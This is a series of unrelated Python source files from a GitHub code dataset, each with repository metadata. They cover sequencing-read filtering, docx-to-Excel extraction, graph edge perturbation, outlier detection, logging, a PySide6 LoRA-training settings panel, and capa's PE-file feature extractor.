ctx))\n","repo_name":"AbigailMcGovern/napari","sub_path":"napari/_qt/widgets/qt_action_context_menu.py","file_name":"qt_action_context_menu.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"17751066443","text":"#!/usr/bin/env python\nimport os\nimport sys\n\nusage = '\\t --------\\n' \\\n '\\t| usage : python discard_5prime_consensus_reads file_1\\n' \\\n '\\t| input : file_1 = blastn_vs_5prime_consensus.tsv\\n' \\\n '\\t| output : a file containing read names to discard\\n' \\\n '\\t --------'\n\nif len(sys.argv) != 2:\n print(usage)\n sys.exit()\n\nquery_dic = {}\nwith open(sys.argv[1], 'r') as tsv:\n for row in tsv:\n columns = row.split('\\t')\n qseqid, length, qstart, qend, sstart, send, qlen, sstrand = columns[0], int(columns[3]), int(\n columns[6]), int(columns[7]), int(columns[8]), int(columns[9]), int(columns[12]), columns[14].rstrip()\n if not qseqid in query_dic:\n if length >= 25:\n if sstrand == 'plus':\n five_prime_overhead = (qstart - 1) - (sstart - 1) - 67\n three_prime_overhead = (qlen - qend) - (93 - send)\n elif sstrand == 'minus':\n five_prime_overhead = (qlen - qend) - (send - 1) - 67\n three_prime_overhead = (qstart - 1) - (93 - sstart)\n else:\n print('------------ERROR------------')\n if five_prime_overhead >= 50 or three_prime_overhead >= 50:\n query_dic[qseqid] = 'keep'\n else:\n query_dic[qseqid] = 'discard'\n\nfile = sys.argv[1].split('/')\nsample = file[-1].split('.')[0]\n\nwith open(sample + '.discard', 'a') as out:\n for k, v in query_dic.items():\n if v == 'discard':\n out.write(k + \"\\n\")\n","repo_name":"ScaonE/TTV","sub_path":"discard_5prime_consensus_reads.py","file_name":"discard_5prime_consensus_reads.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31926874026","text":"# coding=utf-8\nfrom win32com import client as wc\nfrom docx import Document\nimport xlwt\nimport re\nimport os\n\n\ndef docx_to_dict(path):\n print(\"提取文档中景区信息...{}\".format(path))\n document = Document(path)\n l = [paragraph.text for paragraph in document.paragraphs]\n\n scenic = {\n 'name': '',\n 'level': '',\n 'pinyin': '',\n 'spelling': '',\n 'date': '',\n 'tel': '',\n 'country': '',\n 'province': '',\n 'city': '',\n 'region': '',\n 'address': '',\n 
'intro': '',\n        'spot': []\n    }\n\n    # ---------------------------------pattern-------------------------------------------\n    name_pat = re.compile(r'(.*?)(.*?字?数?.*?)')\n    level_pat = re.compile(r'(.*?)级?景[点区]|([无未][等评]级)|(\\dA)级')\n    pinyin_pat = re.compile(r'^\\s*([a-zA-Z]+)\\s*')\n    date_pat = re.compile(r'(开放时间|夏季|旺季):?\\s*(.*)')\n    tel_pat = re.compile(r'(电话|方式):?\\s*(.*)')\n    addr_pat = re.compile(r'地址:\\s*(.*)')\n    none_pat = re.compile(r'^$')\n    # spot_name_pat = re.compile(r'【\\d\\d\\s*(.*?)】')\n    spot_name_pat = re.compile(r'【\\d\\d\\s*(.*?)】.*?\\n', re.S)\n    end_pat = re.compile(r'【?以下.*?[录配]音\\s*】?|【交通建议】')\n\n    # ------------------------------Pre-treatment----------------------------------------\n    content = ''\n    for phr in l:\n        phr = phr.replace(':', ':').replace('(', '(').replace(')', ')')\n        if phr:\n            content += '\\n' + phr\n    spot_start = 0\n    spot_end = 0\n    try:\n        spot_start = spot_name_pat.search(content).regs[0][0]\n        spot_end = end_pat.search(content).regs[0][0] - 1\n\n    except Exception:\n        print(\"Error pre-processing file\t{0}\".format(path))\n    main_info = content[:spot_start - 1]\n    spot_info = content[spot_start:spot_end]\n    # ------------------------------------------- main-info-----------------------------------------------\n    for phr in main_info.split('\\n'):\n        if not phr:\n            continue\n        if name_pat.findall(phr):\n            scenic['name'] = name_pat.findall(phr)[0]\n            name_pat = none_pat\n        elif level_pat.findall(phr):\n            scenic['level'] = level_pat.findall(phr)[0]\n            scenic['level'] = ''.join(scenic['level'])\n            level_pat = none_pat\n        elif pinyin_pat.findall(phr): # use string length to tell abbreviated pinyin from full pinyin\n            if not scenic['pinyin']:\n                scenic['pinyin'] = pinyin_pat.findall(phr)[0]\n            else:\n                scenic['spelling'] = pinyin_pat.findall(phr)[0]\n                if len(scenic['pinyin']) < len(scenic['spelling']):\n                    scenic['pinyin'], scenic['spelling'] = scenic['spelling'], scenic['pinyin']\n\n        elif date_pat.findall(phr):\n            scenic['date'] = date_pat.findall(phr)[0][1]\n            date_pat = none_pat\n        elif tel_pat.findall(phr):\n            scenic['tel'] = tel_pat.findall(phr)[0][1]\n            tel_pat = none_pat\n        elif addr_pat.findall(phr):\n            scenic['address'] = addr_pat.findall(phr)[0]\n            addr_pat = none_pat\n        else:\n            print(\"No suitable match found\t{1}\t{0}\".format(path, phr.split()))\n\n    # ------------------------------------------- spot-info-----------------------------------------------\n    spot_names = spot_name_pat.split(spot_info)\n    spot_names.pop(0)\n    spot_names.pop(0)\n\n    scenic['intro'] = spot_names.pop(0)\n    while spot_names:\n        scenic['spot'].append({'name': spot_names.pop(0), 'desc': spot_names.pop(0)})\n\n    return scenic\n\n\ndef doc_to_docx(src, des):\n    print(\"Converting doc -> docx... {}\".format(src))\n    word = wc.Dispatch('Word.Application')\n    doc = word.Documents.Open(src) # file at the source path\n    doc.SaveAs(des, 16) # file at the converted destination path\n    doc.Close()\n    word.Quit()\n    return des\n\n\ndef dict_to_excel(info):\n    workbook = xlwt.Workbook(encoding='ascii')\n    worksheet = workbook.add_sheet('scenic')\n    worksheet.write(0, 0, label='Row 0, Column 0 Value')\n    workbook.save('Excel_Workbook.xls')\n\n\ndef main():\n    docx_files = []\n    for root, dirs, files in os.walk(r'E:\\Github\\python\\data\\5.28文稿'):\n        for name in files:\n            suffix = os.path.splitext(name)[1]\n            if suffix == '.docx' and '$' not in name:\n                docx_files.append(os.path.join(root, name))\n            if suffix == '.doc' and '$' not in name:\n                doc_path = os.path.join(root, name)\n                des = 'E:/Github/python/data/convert_docx/' + name.replace('.doc', '.docx')\n                try:\n                    docx_path = doc_to_docx(doc_path.replace('\\\\', '/'), des)\n                    docx_files.append(docx_path)\n                except Exception:\n                    
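# report the failure and carry on with the remaining files\n                    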
print(\"格式转换(doc-docx)出错\\t{0}\".format(doc_path))\n\n workbook = xlwt.Workbook(encoding='ascii')\n worksheet = workbook.add_sheet('scenic')\n worksheet.write(0, 0, label='景区名称')\n worksheet.write(0, 1, label='景区级别')\n worksheet.write(0, 2, label='全拼')\n worksheet.write(0, 3, label='简拼')\n worksheet.write(0, 4, label='开放时间')\n worksheet.write(0, 5, label='联系电话')\n worksheet.write(0, 6, label='国家')\n worksheet.write(0, 7, label='省')\n worksheet.write(0, 8, label='市')\n worksheet.write(0, 9, label='区')\n worksheet.write(0, 10, label='地址')\n worksheet.write(0, 11, label='景区文本')\n\n for row, file in enumerate(docx_files):\n scenic_info = docx_to_dict(file)\n column = 0\n for key, value in scenic_info.items():\n if key != 'spot':\n worksheet.write(row + 1, column, label=value)\n column += 1\n\n else:\n for column2, spot in enumerate(value):\n try:\n\n worksheet.write(0, column + column2 * 2, label='景点' + str(column2 + 1) + '名称')\n worksheet.write(0, column + column2 * 2 + 1, label='景点' + str(column2 + 1) + '简介')\n except Exception:\n pass\n worksheet.write(row + 1, column + column2 * 2, label=spot['name'])\n worksheet.write(row + 1, column + column2 * 2 + 1, label=spot['desc'])\n\n workbook.save('Excel_Workbook.xls')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Andychu525/python","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24656522405","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 12 09:29:04 2019\r\n\r\n@author: Jackson\r\n\"\"\"\r\nimport sys\r\nimport networkx as nx\r\nfrom collections import defaultdict\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\n\r\ndef remove_percent_edges(G, percent):\r\n iterations = int((percent / 100) * len(list(G.edges)))\r\n #print('iterations: ', iterations) \r\n for x in range(iterations):\r\n upper_bound = len(list(G.edges)) - 1\r\n randIndex = random.randint(0, upper_bound)\r\n edges = list(G.edges)\r\n #print('rand index: ', randIndex)\r\n #print('removing: ', *edges[randIndex])\r\n G.remove_edge(*edges[randIndex])\r\n \r\ndef add_percent_edges(G, percent):\r\n print('Total edge count start: ', len(list(G.edges)))\r\n iterations = int((percent / 100) * len(list(G.edges)))\r\n for x in range(iterations):\r\n edges = sorted(list(G.edges))\r\n non_edges = list(nx.non_edges(G))\r\n chosen_non_edge = random.choice(non_edges)\r\n print('Chosen edge to add: ', chosen_non_edge)\r\n print('List of current edges: ', edges)\r\n G.add_edge(*chosen_non_edge)\r\n \r\n print('Total edge count end: ', len(list(G.edges)))\r\n\r\nfor x in range(10):\r\n G = nx.read_graphml('hiv.graphml')\r\n remove_percent_edges(G, 1)\r\n nx.write_graphml_lxml(G, \"graphs/hiv-remove-1-\"+str(x+1)+\".graphml\")\r\n\r\nfor x in range(10):\r\n G = nx.read_graphml('hiv.graphml')\r\n remove_percent_edges(G, 5)\r\n nx.write_graphml_lxml(G, \"graphs/hiv-remove-5-\"+str(x+1)+\".graphml\")\r\n \r\nfor x in range(10):\r\n G = nx.read_graphml('hiv.graphml')\r\n remove_percent_edges(G, 10)\r\n nx.write_graphml_lxml(G, \"graphs/hiv-remove-10-\"+str(x+1)+\".graphml\")\r\n \r\nfor x in range(10):\r\n G = nx.read_graphml('hiv.graphml')\r\n remove_percent_edges(G, 1)\r\n nx.write_graphml_lxml(G, \"graphs/hiv-add-1-\"+str(x+1)+\".graphml\")\r\n\r\nfor x in range(10):\r\n G = nx.read_graphml('hiv.graphml')\r\n remove_percent_edges(G, 5)\r\n nx.write_graphml_lxml(G, \"graphs/hiv-add-5-\"+str(x+1)+\".graphml\")\r\n 
\r\nfor x in range(10):\r\n    G = nx.read_graphml('hiv.graphml')\r\n    add_percent_edges(G, 10)\r\n    nx.write_graphml_lxml(G, \"graphs/hiv-add-10-\"+str(x+1)+\".graphml\")","repo_name":"BatesJackson/COSC448_Final_Project","sub_path":"COSC448/Add_Remove_Edges.py","file_name":"Add_Remove_Edges.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12092428090","text":"import numpy as np\nfrom sklearn.covariance import EllipticEnvelope\nfrom sklearn.datasets import make_blobs\n\nfeatures, _ = make_blobs(n_samples=10,\n                         n_features=2,\n                         centers=1,\n                         random_state=1)\n\n# Replace the first observation's values with extreme values\nfeatures[0, 0] = 10000\nfeatures[0, 1] = 10000\n\n# Create the detector\noutlier_detector = EllipticEnvelope(contamination=.1)\n\noutlier_detector.fit(features)\n\n# Predict outliers\nprint(outlier_detector.predict(features))\n\n# The main limitation of this approach is the need to specify the contamination parameter,\n# which is the proportion of observations that are outliers, a value we do not know\n\n# If we expect our data to contain only a few outliers, we can set contamination to some\n# small value. However, if we believe the data is likely to contain outliers,\n# we can set it to a higher value.\n\n# Instead of looking at observations as a whole, we can look at\n# individual features and identify extreme values in those features\n# using the interquartile range (IQR):\n\nfeature = features[:, 0]\n\n\ndef indices_of_outliers(x):\n    q1, q3 = np.percentile(x, [25, 75])\n    iqr = q3 - q1\n    lower_bound = q1 - (iqr * 1.5)\n    upper_bound = q3 + (iqr * 1.5)\n    return np.where((x > upper_bound) | (x < lower_bound))\n\n\nprint(indices_of_outliers(feature))\n","repo_name":"nikneural/MLRecipe4","sub_path":"Обнаружение выбросов.py","file_name":"Обнаружение выбросов.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26560776015","text":"import logging\n\nfmt_str = '%(asctime)s:%(name)s:%(levelname)s:%(process)s:%(filename)s:%(message)s'\n\nlogging.basicConfig(level=logging.DEBUG, format=fmt_str, filename='error.log')\nlogging.debug('debug message')\n\nlogging.info('confirmation note')\nlogging.warning('warning message')\nlogging.error('an error note')\nlogging.critical('panic error')","repo_name":"ravijaya/june-22","sub_path":"demologs/pslog1.py","file_name":"pslog1.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37392359599","text":"import os.path\nfrom typing import Union\n\nfrom PySide6 import QtWidgets, QtCore, QtGui\n\nimport modules.DragDropLineEdit\nfrom ui_files.BaseUI import Ui_base_args_ui\nfrom modules.CollapsibleWidget import CollapsibleWidget\n\n\nclass BaseArgsWidget(QtWidgets.QWidget):\n    CacheLatentsChecked = QtCore.Signal(bool)\n\n    def __init__(self, parent: QtWidgets.QWidget = None) -> None:\n        super(BaseArgsWidget, self).__init__(parent)\n        self.args = {\"pretrained_model_name_or_path\": \"\", \"mixed_precision\": \"fp16\", \"seed\": 23, \"clip_skip\": 2,\n                     \"xformers\": True, \"max_train_epochs\": 1, \"max_data_loader_n_workers\": 1,\n                     \"persistent_data_loader_workers\": True, \"max_token_length\": 225, \"prior_loss_weight\": 
1.0}\n self.dataset_args = {\"resolution\": 512, \"batch_size\": 1}\n self.name = \"general_args\"\n self.setLayout(QtWidgets.QVBoxLayout())\n self.colap = CollapsibleWidget(self, \"General Args\")\n self.layout().addWidget(self.colap)\n self.layout().setContentsMargins(9, 0, 9, 0)\n self.content = QtWidgets.QWidget()\n self.colap.add_widget(self.content, \"main_widget\")\n\n self.widget = Ui_base_args_ui()\n self.widget.setupUi(self.content)\n self.widget.base_model_input.highlight = True\n self.widget.base_model_input.setMode(\"file\", ['.ckpt', '.pt', '.safetensors'])\n self.widget.base_model_selector.setIcon(QtGui.QIcon(os.path.join(\"icons\", \"more-horizontal.svg\")))\n\n # Base Model connections\n self.widget.base_model_input.textChanged.connect(lambda x: self.edit_args(\"pretrained_model_name_or_path\", x,\n elem=self.widget.base_model_input))\n self.widget.base_model_selector.clicked.connect(self.set_from_dialog)\n self.widget.v2_enable.clicked.connect(self.enable_disable_sd2)\n self.widget.v_param_enable.clicked.connect(lambda x: self.enable_disable_sd2(self.widget.v2_enable.isChecked()))\n self.widget.v_pred_enable.clicked.connect(lambda x: self.edit_args(\"scale_v_pred_loss_like_noise_pred\", x, True))\n\n # resolution connections\n self.widget.width_input.valueChanged.connect(lambda x: self.change_resolution(True, x))\n self.widget.height_input.valueChanged.connect(lambda x: self.change_resolution(False, x))\n self.widget.height_enable.clicked.connect(self.enable_disable_height)\n\n # gradient connections\n self.widget.gradient_box.clicked.connect(self.enable_disable_gradient)\n self.widget.gradient_selector.currentIndexChanged.connect(lambda x: self.enable_disable_gradient(True))\n self.widget.gradient_steps_input.valueChanged.connect(\n lambda x: self.edit_args(\"gradient_accumulation_steps\", x))\n\n # max training time connections\n self.widget.max_train_selector.currentIndexChanged.connect(self.max_training_select)\n self.widget.max_train_input.valueChanged.connect(\n lambda x: self.max_training_select(self.widget.max_train_selector.currentIndex()))\n\n # cache latents connections\n self.widget.cache_latents_enable.clicked.connect(self.enable_cache_latents)\n self.widget.cache_latents_to_disk_enable.clicked.connect(lambda x: self.enable_cache_latents(True))\n\n # Comment in Metadata\n self.widget.comment_enable.clicked.connect(self.enable_disable_comment)\n self.widget.comment_input.textChanged.connect(lambda: self.edit_args(\n \"training_comment\", self.widget.comment_input.toPlainText(), True))\n\n # generic connections\n self.widget.seed_input.valueChanged.connect(lambda x: self.edit_args(\"seed\", x))\n self.widget.clip_skip_input.valueChanged.connect(lambda x: self.edit_args(\"clip_skip\", x))\n self.widget.loss_weight_input.valueChanged.connect(lambda x: self.edit_args(\"prior_loss_weight\",\n round(x, 2)))\n self.widget.xformers_enable.clicked.connect(self.enable_disable_xformers)\n self.widget.batch_size_input.valueChanged.connect(lambda x: self.edit_dataset_args(\"batch_size\", x))\n self.widget.max_token_selector.currentIndexChanged.connect(self.edit_token_length)\n self.widget.mixed_precision_selector.currentTextChanged.connect(lambda x: self.edit_args(\n \"mixed_precision\", x if x != \"float\" else \"no\"))\n\n @QtCore.Slot(str, object, bool, QtWidgets.QWidget)\n def edit_args(self, name: str, value: object, optional: bool = False, elem: QtWidgets.QWidget = None) -> None:\n if elem and isinstance(elem, modules.DragDropLineEdit.DragDropLineEdit):\n 
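# re-apply the line edit's stylesheet so its validity highlighting stays current\n            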
elem.update_stylesheet()\n if not optional:\n self.args[name] = value\n return\n if not value:\n if name in self.args:\n del self.args[name]\n return\n self.args[name] = value\n\n @QtCore.Slot(str, object, bool)\n def edit_dataset_args(self, name: str, value: object, optional: bool = False) -> None:\n if not optional:\n self.dataset_args[name] = value\n return\n if not value:\n if name in self.dataset_args:\n del self.dataset_args[name]\n return\n self.dataset_args[name] = value\n\n @QtCore.Slot()\n def set_from_dialog(self) -> None:\n extensions = \" \".join([\"*\" + s for s in self.widget.base_model_input.extensions])\n default_folder = os.path.split(self.widget.base_model_input.text())[0] if \\\n os.path.exists(self.widget.base_model_input.text()) else \"\"\n file_name, _ = QtWidgets.QFileDialog.getOpenFileName(\n self, \"Open Model File\", dir=default_folder,\n filter=f\"Stable Diffusion Models ({extensions})\")\n self.widget.base_model_input.setText(file_name or self.widget.base_model_input.text())\n\n @QtCore.Slot(bool)\n def enable_disable_sd2(self, checked: bool) -> None:\n if checked:\n self.args['v2'] = True\n self.widget.v_param_enable.setEnabled(True)\n self.edit_args(\"v_parameterization\", self.widget.v_param_enable.isChecked(), True)\n if self.widget.v_param_enable.isChecked():\n self.widget.v_pred_enable.setEnabled(True)\n self.edit_args(\"scale_v_pred_loss_like_noise_pred\", self.widget.v_pred_enable.isChecked(), True)\n else:\n self.widget.v_pred_enable.setEnabled(False)\n self.edit_args(\"scale_v_pred_loss_like_noise_pred\", False, True)\n else:\n self.widget.v_param_enable.setEnabled(False)\n self.widget.v_pred_enable.setEnabled(False)\n for name in ['v2', 'v_parameterization', 'scale_v_pred_loss_like_noise_pred']:\n if name in self.args:\n del self.args[name]\n\n @QtCore.Slot(bool)\n def enable_disable_height(self, checked: bool) -> None:\n if checked:\n self.widget.height_input.setEnabled(True)\n self.dataset_args['resolution'] = [self.widget.width_input.value(), self.widget.height_input.value()]\n else:\n self.widget.height_input.setEnabled(False)\n self.dataset_args['resolution'] = self.widget.width_input.value()\n\n @QtCore.Slot(bool, int)\n def change_resolution(self, width: bool, value: int) -> None:\n if width:\n self.dataset_args['resolution'] = [value, self.widget.height_input.value()] if \\\n self.widget.height_input.isEnabled() else value\n else:\n self.dataset_args['resolution'] = [self.widget.width_input.value(), value]\n\n @QtCore.Slot(bool)\n def enable_disable_gradient(self, checked: bool) -> None:\n for name in ['gradient_checkpointing', 'gradient_accumulation_steps']:\n if name in self.args:\n del self.args[name]\n if checked:\n checkpointing = self.widget.gradient_selector.currentIndex() == 0\n if checkpointing:\n self.args['gradient_checkpointing'] = True\n self.widget.gradient_steps_input.setEnabled(False)\n else:\n self.args['gradient_accumulation_steps'] = self.widget.gradient_steps_input.value()\n self.widget.gradient_steps_input.setEnabled(True)\n\n @QtCore.Slot(bool)\n def enable_disable_comment(self, checked: bool) -> None:\n self.widget.comment_input.setEnabled(checked)\n self.edit_args(\"training_comment\", self.widget.comment_input.toPlainText() if checked else None, True)\n\n @QtCore.Slot(int)\n def max_training_select(self, index: int) -> None:\n for name in ['max_train_epochs', \"max_train_steps\"]:\n if name in self.args:\n del self.args[name]\n self.args[f'max_train_{\"epochs\" if index == 0 else \"steps\"}'] = 
self.widget.max_train_input.value()\n\n    @QtCore.Slot(bool)\n    def enable_cache_latents(self, checked: bool) -> None:\n        for name in ['cache_latents', \"cache_latents_to_disk\"]:\n            if name in self.args:\n                del self.args[name]\n        self.CacheLatentsChecked.emit(checked)\n        if checked:\n            self.args['cache_latents'] = True\n            self.widget.cache_latents_to_disk_enable.setEnabled(True)\n            if self.widget.cache_latents_to_disk_enable.isChecked():\n                self.args['cache_latents_to_disk'] = True\n        else:\n            self.widget.cache_latents_to_disk_enable.setEnabled(False)\n\n    @QtCore.Slot(bool)\n    def enable_disable_xformers(self, checked: bool) -> None:\n        if \"xformers\" in self.args:\n            del self.args['xformers']\n        if checked:\n            self.args['xformers'] = True\n\n    @QtCore.Slot(int)\n    def edit_token_length(self, index: int) -> None:\n        # the stale value lives in self.args (not self.dataset_args), so check there before deleting\n        if \"max_token_length\" in self.args:\n            del self.args['max_token_length']\n        if index != 2:\n            self.args['max_token_length'] = int(self.widget.max_token_selector.currentText())\n\n    def get_args(self, input_args: dict) -> None:\n        valid = self.widget.base_model_input.update_stylesheet()\n        input_args['general_args'] = self.args if valid else None\n        if not valid and self.colap.is_collapsed:\n            self.colap.toggle_collapsed()\n            self.colap.title_frame.update_arrow(False)\n            self.colap.title_frame.setChecked(True)\n\n    def get_dataset_args(self, input_args: dict) -> None:\n        valid = self.widget.base_model_input.update_stylesheet()\n        input_args['general_args'] = self.dataset_args if valid else None\n\n    def load_args(self, args: dict) -> None:\n        if self.name not in args:\n            return\n        args, dataset_args = args[self.name]['args'], args[self.name]['dataset_args']\n\n        # base model args\n        self.widget.base_model_input.setText(args['pretrained_model_name_or_path'])\n\n        # v2 args\n        self.widget.v2_enable.setChecked(args.get('v2', False))\n        self.widget.v_param_enable.setChecked(args.get(\"v_parameterization\", False))\n        self.widget.v_pred_enable.setChecked(args.get('scale_v_pred_loss_like_noise_pred', False))\n        self.enable_disable_sd2(self.widget.v2_enable.isChecked())\n\n        # resolution args\n        if isinstance(dataset_args['resolution'], list):\n            self.widget.height_input.setEnabled(True)\n            self.widget.height_enable.setChecked(True)\n            self.widget.width_input.setValue(dataset_args['resolution'][0])\n            self.widget.height_input.setValue(dataset_args['resolution'][1])\n        else:\n            self.widget.height_input.setEnabled(False)\n            self.widget.height_enable.setChecked(False)\n            self.widget.width_input.setValue(dataset_args['resolution'])\n\n        # gradient args\n        if \"gradient_checkpointing\" in args or 'gradient_accumulation_steps' in args:\n            self.widget.gradient_box.setChecked(True)\n            self.widget.gradient_selector.setCurrentIndex(0 if \"gradient_checkpointing\" in args else 1)\n            self.widget.gradient_steps_input.setValue(args.get('gradient_accumulation_steps', 1))\n            self.enable_disable_gradient(True)\n        else:\n            self.widget.gradient_box.setChecked(False)\n            self.enable_disable_gradient(False)\n\n        self.widget.seed_input.setValue(args['seed'])\n        self.widget.clip_skip_input.setValue(args['clip_skip'])\n        self.widget.loss_weight_input.setValue(args['prior_loss_weight'])\n        self.widget.xformers_enable.setChecked(args.get(\"xformers\", False))\n        self.widget.cache_latents_to_disk_enable.setChecked(args.get(\"cache_latents_to_disk\", False))\n        self.enable_cache_latents(args.get(\"cache_latents\", False))\n        self.widget.cache_latents_enable.setChecked(args.get(\"cache_latents\", False))\n        self.widget.batch_size_input.setValue(dataset_args['batch_size'])\n        
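# map the remaining saved scalar args back onto the selector widgets (token length, precision, epochs/steps)\n        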
token_len = args['max_token_length']\n index = 0 if token_len == 225 else 1 if token_len == 150 else 2\n self.widget.max_token_selector.setCurrentIndex(index)\n train_prec = args['mixed_precision']\n index = 0 if train_prec == 'fp16' else 1 if train_prec == 'bf16' else 2\n self.widget.mixed_precision_selector.setCurrentIndex(index)\n index = 0 if args.get(\"max_train_epochs\") else 1\n self.widget.max_train_selector.setCurrentIndex(index)\n self.widget.max_train_input.setValue(args['max_train_epochs'] if index == 0 else args['max_train_steps'])\n checked = True if args.get('training_comment', False) else False\n self.widget.comment_input.setText(args.get('training_comment', \"\"))\n self.widget.comment_enable.setChecked(checked)\n self.enable_disable_comment(checked)\n\n def save_args(self) -> Union[dict, None]:\n return self.args\n\n def save_dataset_args(self) -> Union[dict, None]:\n return self.dataset_args\n","repo_name":"derrian-distro/LoRA_Easy_Training_Scripts","sub_path":"main_ui_files/GeneralUI.py","file_name":"GeneralUI.py","file_ext":"py","file_size_in_byte":13956,"program_lang":"python","lang":"en","doc_type":"code","stars":738,"dataset":"github-code","pt":"47"} +{"seq_id":"31049646345","text":"import logging\nfrom pathlib import Path\n\nimport pefile\n\nimport capa.features.common\nimport capa.features.extractors\nimport capa.features.extractors.common\nimport capa.features.extractors.helpers\nimport capa.features.extractors.strings\nfrom capa.features.file import Export, Import, Section\nfrom capa.features.common import OS, ARCH_I386, FORMAT_PE, ARCH_AMD64, OS_WINDOWS, Arch, Format, Characteristic\nfrom capa.features.address import NO_ADDRESS, FileOffsetAddress, AbsoluteVirtualAddress\nfrom capa.features.extractors.base_extractor import FeatureExtractor\n\nlogger = logging.getLogger(__name__)\n\n\ndef extract_file_embedded_pe(buf, **kwargs):\n for offset, _ in capa.features.extractors.helpers.carve_pe(buf, 1):\n yield Characteristic(\"embedded pe\"), FileOffsetAddress(offset)\n\n\ndef extract_file_export_names(pe, **kwargs):\n base_address = pe.OPTIONAL_HEADER.ImageBase\n\n if hasattr(pe, \"DIRECTORY_ENTRY_EXPORT\"):\n for export in pe.DIRECTORY_ENTRY_EXPORT.symbols:\n if not export.name:\n continue\n try:\n name = export.name.partition(b\"\\x00\")[0].decode(\"ascii\")\n except UnicodeDecodeError:\n continue\n\n if export.forwarder is None:\n va = base_address + export.address\n yield Export(name), AbsoluteVirtualAddress(va)\n\n else:\n try:\n forwarded_name = export.forwarder.partition(b\"\\x00\")[0].decode(\"ascii\")\n except UnicodeDecodeError:\n continue\n forwarded_name = capa.features.extractors.helpers.reformat_forwarded_export_name(forwarded_name)\n va = base_address + export.address\n yield Export(forwarded_name), AbsoluteVirtualAddress(va)\n yield Characteristic(\"forwarded export\"), AbsoluteVirtualAddress(va)\n\n\ndef extract_file_import_names(pe, **kwargs):\n \"\"\"\n extract imported function names\n 1. imports by ordinal:\n - modulename.#ordinal\n 2. 
imports by name, results in two features to support importname-only matching:\n - modulename.importname\n - importname\n \"\"\"\n if hasattr(pe, \"DIRECTORY_ENTRY_IMPORT\"):\n for dll in pe.DIRECTORY_ENTRY_IMPORT:\n try:\n modname = dll.dll.partition(b\"\\x00\")[0].decode(\"ascii\")\n except UnicodeDecodeError:\n continue\n\n # strip extension\n modname = modname.rpartition(\".\")[0].lower()\n\n for imp in dll.imports:\n if imp.import_by_ordinal:\n impname = f\"#{imp.ordinal}\"\n else:\n try:\n impname = imp.name.partition(b\"\\x00\")[0].decode(\"ascii\")\n except UnicodeDecodeError:\n continue\n\n for name in capa.features.extractors.helpers.generate_symbols(modname, impname):\n yield Import(name), AbsoluteVirtualAddress(imp.address)\n\n\ndef extract_file_section_names(pe, **kwargs):\n base_address = pe.OPTIONAL_HEADER.ImageBase\n\n for section in pe.sections:\n try:\n name = section.Name.partition(b\"\\x00\")[0].decode(\"ascii\")\n except UnicodeDecodeError:\n continue\n\n yield Section(name), AbsoluteVirtualAddress(base_address + section.VirtualAddress)\n\n\ndef extract_file_strings(buf, **kwargs):\n yield from capa.features.extractors.common.extract_file_strings(buf)\n\n\ndef extract_file_function_names(**kwargs):\n \"\"\"\n extract the names of statically-linked library functions.\n \"\"\"\n if False:\n # using a `yield` here to force this to be a generator, not function.\n yield NotImplementedError(\"pefile doesn't have library matching\")\n return\n\n\ndef extract_file_os(**kwargs):\n # assuming PE -> Windows\n # though i suppose they're also used by UEFI\n yield OS(OS_WINDOWS), NO_ADDRESS\n\n\ndef extract_file_format(**kwargs):\n yield Format(FORMAT_PE), NO_ADDRESS\n\n\ndef extract_file_arch(pe, **kwargs):\n if pe.FILE_HEADER.Machine == pefile.MACHINE_TYPE[\"IMAGE_FILE_MACHINE_I386\"]:\n yield Arch(ARCH_I386), NO_ADDRESS\n elif pe.FILE_HEADER.Machine == pefile.MACHINE_TYPE[\"IMAGE_FILE_MACHINE_AMD64\"]:\n yield Arch(ARCH_AMD64), NO_ADDRESS\n else:\n logger.warning(\"unsupported architecture: %s\", pefile.MACHINE_TYPE[pe.FILE_HEADER.Machine])\n\n\ndef extract_file_features(pe, buf):\n \"\"\"\n extract file features from given workspace\n\n args:\n pe (pefile.PE): the parsed PE\n buf: the raw sample bytes\n\n yields:\n Tuple[Feature, VA]: a feature and its location.\n \"\"\"\n\n for file_handler in FILE_HANDLERS:\n # file_handler: type: (pe, bytes) -> Iterable[Tuple[Feature, Address]]\n for feature, va in file_handler(pe=pe, buf=buf): # type: ignore\n yield feature, va\n\n\nFILE_HANDLERS = (\n extract_file_embedded_pe,\n extract_file_export_names,\n extract_file_import_names,\n extract_file_section_names,\n extract_file_strings,\n extract_file_function_names,\n extract_file_format,\n)\n\n\ndef extract_global_features(pe, buf):\n \"\"\"\n extract global features from given workspace\n\n args:\n pe (pefile.PE): the parsed PE\n buf: the raw sample bytes\n\n yields:\n Tuple[Feature, VA]: a feature and its location.\n \"\"\"\n for handler in GLOBAL_HANDLERS:\n # file_handler: type: (pe, bytes) -> Iterable[Tuple[Feature, Address]]\n for feature, va in handler(pe=pe, buf=buf): # type: ignore\n yield feature, va\n\n\nGLOBAL_HANDLERS = (\n extract_file_os,\n extract_file_arch,\n)\n\n\nclass PefileFeatureExtractor(FeatureExtractor):\n def __init__(self, path: Path):\n super().__init__()\n self.path: Path = path\n self.pe = pefile.PE(str(path))\n\n def get_base_address(self):\n return AbsoluteVirtualAddress(self.pe.OPTIONAL_HEADER.ImageBase)\n\n def extract_global_features(self):\n buf = 
